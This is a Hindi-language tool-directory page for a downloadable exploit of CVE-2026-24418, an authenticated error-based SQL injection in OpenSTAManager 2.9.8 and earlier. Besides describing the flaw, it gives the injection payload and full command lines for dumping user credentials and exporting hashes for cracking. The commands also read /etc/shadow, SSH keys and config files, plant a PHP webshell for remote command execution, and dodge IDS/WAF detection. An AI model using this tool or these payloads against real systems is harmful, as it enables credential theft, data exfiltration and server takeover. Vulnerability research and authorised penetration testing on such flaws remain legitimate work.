Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bridgeralderson/cve-2026-24418
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगडेटाबेस सुरक्षा
GitHubbridgeralderson/cve-2026-24418

CVE-2026-24418

OpenSTAManager v2.9.8 और इससे पहले के संस्करणों में Scadenzario (भुगतान अनुसूची) मॉड्यूल के लिए bulk operations handler में एक गंभीर Error-Based SQL Injection भेद्यता है।

रिपॉजिटरी देखें
2133 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24418

OpenSTAManager <= 2.9.8 — स्कैडेनज़ारियो बल्क ऑपरेशन मॉड्यूल में एरर-आधारित SQL इंजेक्शन

अवलोकन

फ़ील्डविवरण
CVE IDCVE-2026-24418
गंभीरताउच्च (8.8)
CWECWE-89: SQL इंजेक्शन
प्रभावित संस्करणOpenSTAManager <= 2.9.8
कमजोर पैरामीटरid_records[] (POST array)
कमजोर एंडपॉइंट/actions.php?id_module=18
हमले का प्रकारएरर-आधारित SQL इंजेक्शन (EXTRACTVALUE)
प्रमाणीकरणआवश्यक (कोई भी वैध उपयोगकर्ता खाता)

कमजोरी का विवरण

OpenSTAManager v2.9.8 और इसके पहले के संस्करणों में स्कैडेनज़ारियो (भुगतान अनुसूची) मॉड्यूल के बल्क ऑपरेशन हैंडलर में एक गंभीर एरर-आधारित SQL इंजेक्शन कमजोरी है। एप्लिकेशन यह सत्यापित करने में विफल रहता है कि id_records[] array के तत्व SQL IN() क्लॉज में उपयोग करने से पहले पूर्णांक हैं या नहीं, जिससे प्रमाणित हमलावर मनमानी SQL कमांड इंजेक्ट कर सकते हैं और XPATH त्रुटि संदेशों के माध्यम से संवेदनशील डेटा निकाल सकते हैं।

मूल कारण

  1. प्रवेश बिंदु — /actions.php POST के माध्यम से id_records[] प्राप्त करता है
  2. अपर्याप्त सैनिटाइजेशन — array_clean() केवल खाली मानों को हटाता है, डेटा प्रकारों को मान्य नहीं करता
  3. इंजेक्शन बिंदु — /modules/scadenzario/bulk.php असैनिटाइज्ड मानों को सीधे SQL IN() क्लॉज में पास करता है
  4. डेटा निष्कर्षण — EXTRACTVALUE/UPDATEXML त्रुटि संदेश क्वेरी परिणामों को लीक करते हैं

सुविधाएँ

सुविधाविवरण
--infoडेटाबेस सर्वर फिंगरप्रिंटिंग (संस्करण, उपयोगकर्ता, होस्टनाम, OS, पथ)
--privsMySQL विशेषाधिकार गणना (FILE, SUPER, PROCESS)
--userszz_users से पूर्ण क्रेडेंशियल डंप, स्वचालित हैश निर्यात के साथ
--dbsसभी सुलभ डेटाबेस गिनें
--tablesपंक्ति गणना के साथ तालिकाएँ सूचीबद्ध करें
--columnsप्रकार और nullable जानकारी के साथ कॉलम सूचीबद्ध करें
--dumpकिसी भी तालिका/कॉलम से डेटा निष्कर्षण
--sqlकस्टम SQL क्वेरी निष्पादन
--file-readLOAD_FILE() के माध्यम से सर्वर फ़ाइलें पढ़ें (/etc/passwd, कॉन्फ़िग फ़ाइलें, SSH कुंजियाँ)
--file-read-hexफ़िल्टर को बायपास करने के लिए HEX-एनकोडेड फ़ाइल पढ़ना
--webshellINTO DUMPFILE के माध्यम से PHP वेबशेल अपलोड करें
--rceअपलोड की गई वेबशेल के माध्यम से इंटरैक्टिव कमांड निष्पादन
-o / --outputसभी परिणाम JSON, CSV, और hashcat/john प्रारूपों में सहेजें
--proxyHTTP प्रॉक्सी समर्थन (Burp Suite)
--delayIDS/WAF चोरी के लिए अनुरोध थ्रॉटलिंग

स्थापना

git clone https://github.com/BridgerAlderson/CVE-2026-24418.git
cd CVE-2026-24418
pip install requests

उपयोग

प्रमाणीकरण

# क्रेडेंशियल्स के साथ लॉगिन
python3 exploit.py -t http://target.com -u admin -p password --info

# मौजूदा सत्र कुकी का उपयोग करें
python3 exploit.py -t http://target.com -c <PHPSESSID_VALUE> --info

टोह लेना

# डेटाबेस जानकारी + विशेषाधिकार + उपयोगकर्ता क्रेडेंशियल्स
python3 exploit.py -t http://target.com -u admin -p secret --all

# MySQL विशेषाधिकार जाँचें (FILE, SUPER, आदि)
python3 exploit.py -t http://target.com -u admin -p secret --privs

क्रेडेंशियल निष्कर्षण

# उपयोगकर्ताओं को डंप करें और हैश स्वचालित रूप से निर्यात करें
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot

# आउटपुट फ़ाइलें:
#   ./loot/users.json          - पूर्ण उपयोगकर्ता डेटा
#   ./loot/users.csv           - CSV प्रारूप
#   ./loot/hashes_hashcat.txt  - Hashcat प्रारूप (मोड 3200)
#   ./loot/hashes_john.txt     - John प्रारूप (user:hash)

डेटाबेस गणना

# सभी डेटाबेस सूचीबद्ध करें
python3 exploit.py -t http://target.com -u admin -p secret --dbs

# किसी विशिष्ट डेटाबेस में तालिकाएँ सूचीबद्ध करें
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager

# तालिका के कॉलम सूचीबद्ध करें
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users

# पंक्ति सीमा के साथ विशिष्ट कॉलम डंप करें
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10

फ़ाइल पढ़ना (LFI via SQL)

# /etc/passwd पढ़ें
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd

# एप्लिकेशन कॉन्फ़िग (डेटाबेस क्रेडेंशियल्स) पढ़ें
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php

# SSH कुंजियाँ पढ़ें
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa

# HEX मोड (वर्ण फ़िल्टर बायपास)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow

रिमोट कोड निष्पादन

# वेबशेल अपलोड करें (स्वचालित रूप से वेबरूट का पता लगाता है)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# विशिष्ट वेबरूट के साथ वेबशेल अपलोड करें
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html

# इंटरैक्टिव शेल सत्र
python3 exploit.py -t http://target.com -u admin -p secret --rce

# RCE स्वचालित रूप से वेबशेल अपलोड करेगा यदि कोई मौजूद नहीं है

आउटपुट और रिपोर्टिंग

# सब कुछ एक निर्देशिका में सहेजें
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot

# उत्पन्न फ़ाइलें:
#   db_info.json, privileges.json, users.json, users.csv,
#   hashes_hashcat.txt, hashes_john.txt

नेटवर्क विकल्प

# Burp Suite प्रॉक्सी के माध्यम से
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080

# अनुरोध विलंब के साथ (अनुरोधों के बीच 2 सेकंड)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2

# SSL सत्यापन छोड़ें
python3 exploit.py -t https://target.com -u admin -p secret --info -k

पूर्ण विकल्प संदर्भ

Target:
  -t, --target           लक्ष्य आधार URL

प्रमाणीकरण:
  -u, --user             लॉगिन के लिए उपयोगकर्ता नाम
  -p, --password         लॉगिन के लिए पासवर्ड
  -c, --cookie           मौजूदा PHPSESSID मान

गणना:
  -D, --database         लक्ष्य डेटाबेस नाम
  -T, --table            लक्ष्य तालिका नाम
  -C, --columns-list     डंप करने के लिए कॉलम (अल्पविराम से अलग)
  --limit                डंप के लिए पंक्ति सीमा

कार्रवाइयाँ:
  --info                 डेटाबेस सर्वर जानकारी
  --users                zz_users क्रेडेंशियल डंप करें
  --dbs                  डेटाबेस गिनें
  --tables               तालिकाएँ सूचीबद्ध करें
  --columns              कॉलम सूचीबद्ध करें (-T आवश्यक)
  --dump                 डेटा डंप करें (-T और -C आवश्यक)
  --sql QUERY            कस्टम SQL क्वेरी
  --all                  --info + --privs + --users चलाएँ
  --privs                MySQL विशेषाधिकार जाँचें

फ़ाइल संचालन:
  --file-read PATH       LOAD_FILE() के माध्यम से फ़ाइल पढ़ें
  --file-read-hex PATH   HEX एन्कोडिंग के माध्यम से फ़ाइल पढ़ें

रिमोट कोड निष्पादन:
  --webshell             PHP वेबशेल अपलोड करें
  --webroot PATH         शेल अपलोड के लिए वेबरूट पथ
  --rce                  इंटरैक्टिव कमांड निष्पादन

आउटपुट:
  -o, --output DIR       परिणाम निर्देशिका में सहेजें

नेटवर्क:
  -m, --module-id        मॉड्यूल ID (डिफ़ॉल्ट: 18)
  --proxy                HTTP प्रॉक्सी URL
  -k, --no-ssl-verify    SSL सत्यापन अक्षम करें
  --delay                सेकंड में अनुरोध विलंब

तकनीकी विवरण

पेलोड संरचना

id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(<SQL_QUERY>)))#

EXTRACTVALUE वर्ण सीमा

MySQL का EXTRACTVALUE() XPATH त्रुटियों के माध्यम से अधिकतम ~32 वर्ण लौटाता है। उपकरण स्वचालित रूप से SUBSTRING() का उपयोग करके लंबे परिणामों को टुकड़ों में विभाजित करता है:

SUBSTRING((<query>), 1, 31)    -- Chunk 1
SUBSTRING((<query>), 32, 31)   -- Chunk 2
...

वेबशेल अपलोड तंत्र

टूल डाउनलोड करें